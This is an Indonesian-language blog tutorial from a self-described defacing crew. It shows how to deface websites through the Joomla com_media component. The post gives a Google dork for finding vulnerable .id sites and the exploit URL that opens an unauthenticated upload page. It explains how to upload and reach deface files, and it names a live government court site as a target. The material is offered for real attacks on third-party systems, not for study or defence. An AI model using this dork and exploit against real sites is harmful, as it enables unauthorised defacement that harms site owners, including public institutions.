Reflected XSS On mirror.22xploitercrew.com

BELAJAR DEFACE COM_MEDIA Bersama FRI3NDS CYBER ARMY


Belajar deface poc? Com_Media bersama FRI3NDS CYBER ARMY

Hallaw ges :v welcome come bak with MR.CR0T_D1LU4R yang HANDSOME ea :v

Seperti biasa mimin akan memberikan tutorial lago tentang depes(deface) ea :v Poc?=>COM_MEDIA

Tapi sebelum lanjut mimin mengucapkan SELAMAT MENUNAIKAN IBADAH BULAN SUCI RAMADHAN 

Oke kita lanjut aja bahan bahan

-Otak
-hp/pc/laptop
-dork
-Exoloit
-Sabun bolong
-Udud+kopi (wajib)

Oke kita langsung kita mulai saja ges dorking di mbah gugel :v

Dork: inurl:com_media site:id (kembangin bangsad)

Exploit: index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Kalo kalian sudah menemukai websitenya? Kalian langsung saja masukan exploitnya

Contoh

https://crotdiluar.blogspot.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Kalo vuln nanti akan di arahkan ke tempat upload, dan kalo ngga akan di arahkan ke salon mungkin faktor face aowkwkwk

Oke karna disini hanya bisa file berextensi txt dan juga jpg, jadi kalian buat dulu FILE.txt

Jika sudah? Nah kalian tinggal manggil file kalian dengan cara seperti ini

https://crotdiluar.blogspot.com/Images/namafile.txt

Nah kalo kalian uploadnya gambar? Kalian cara manggilnya begini

https://crotdiluar.blogspot.com/images/namagambar.jpg

Oke kalo sudah? Mari kita lihat hasilnya njeng aowkwk

Live target:

http://pt-palangkaraya.go.id

Oke jangan lupa su ikutin aktifitas kami di sosial media lain nya aowkwk

Instagram:@officialfca
Youtube:Klik disini, jangan lupa subrek

Comments